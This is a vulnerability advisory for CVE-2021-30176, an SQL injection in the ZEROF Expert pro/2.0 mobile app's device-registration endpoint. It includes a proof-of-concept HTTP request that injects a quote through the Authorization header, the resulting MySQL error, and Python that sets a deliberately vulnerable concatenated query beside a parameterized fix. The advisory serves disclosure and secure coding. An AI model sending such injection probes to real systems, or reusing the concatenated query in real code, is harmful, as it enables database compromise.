CVE-2021-30176
Description
The ZEROF Expert pro/2.0 application for mobile devices allows SQL Injection.
Additional Information
Parameters received by the web application must be sanitized and filtered so that attacker-supplied SQL control constructs are never executed by the database.
Vulnerability Type
SQL Injection
Vendor of Product
Zerof
Affected Product Code Base
ZEROF Expert pro/2.0 (mobile app)
Affected Component
/v2/devices/add endpoint, Authorization header
Attack Type
Remote
Impact Code execution
true
Impact Information Disclosure
true
Discoverer
- Anna Sidorova
- AWILLIX LLC
Attack Vectors
Example:
POST /v2/devices/add HTTP/1.1
Host: zerof
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Date: Thu, 07 Apr 2021 13:40:57 +0300
Content-Length: 241
User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2
Accept-Language: ru-RU;q=1.0
Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak=
Accept-Encoding: gzip, deflate
device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 176
Date: Wed, 07 Apr 2021 10:35:59 GMT
Server: ZEROF Web Server
<html> #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1 </html>
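As an added illustration (not code from the advisory or from the vendor), the Python below puts the vulnerable concatenation pattern that the 500 error above points to beside the hardened handling the Additional Information section calls for: strict parsing of the `ZWS user:signature` Authorization header, then a parameterized lookup. The user table, the stored credentials and the exact header grammar are constructed assumptions, and sqlite3 stands in for the server's MySQL.

```python
import hmac
import re
import sqlite3

# Constructed user store standing in for the server's database (assumption: the advisory
# only shows that the header value reaches a MySQL statement, not the schema).
ROWS = [("admin", "Y29uc3RydWN0ZWQtc2FtcGxl"), ("alice", "YWxpY2U=")]

# Assumed grammar: "ZWS <user>:<base64 signature>", user restricted to a safe character set.
HEADER_RE = re.compile(r"^ZWS (?P<user>[A-Za-z0-9_.-]{1,64}):(?P<sig>[A-Za-z0-9+/]+={0,2})$")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, credential TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def parse_authorization(header):
    """Return (user, sig) when the header matches the expected grammar, else None."""
    m = HEADER_RE.match(header)
    return (m.group("user"), m.group("sig")) if m else None


def lookup_unsafe(conn, user):
    """Vulnerable pattern: the user name is spliced into the SQL text (mirrors the page's error)."""
    try:
        row = conn.execute("SELECT credential FROM users WHERE name = '" + user + "'").fetchone()
        return "ok", (row[0] if row else None)
    except sqlite3.Error as exc:
        return "sql-error", str(exc)


def lookup_safe(conn, user):
    """Hardened: the value is bound as a parameter, so it can never change the statement."""
    row = conn.execute("SELECT credential FROM users WHERE name = ?", (user,)).fetchone()
    return row[0] if row else None


def authenticate(conn, header):
    """Validate the header grammar first, then look the user up with a bound parameter.
    Returns the user name on success and None for malformed or unknown credentials."""
    parsed = parse_authorization(header)
    if parsed is None:
        return None
    user, sig = parsed
    stored = lookup_safe(conn, user)
    if stored is None or not hmac.compare_digest(stored, sig):
        return None
    return user
```

With the header from the request above, `parse_authorization` rejects `admin'` before any query runs, and even `lookup_safe` on that raw value simply finds no such user instead of raising a syntax error.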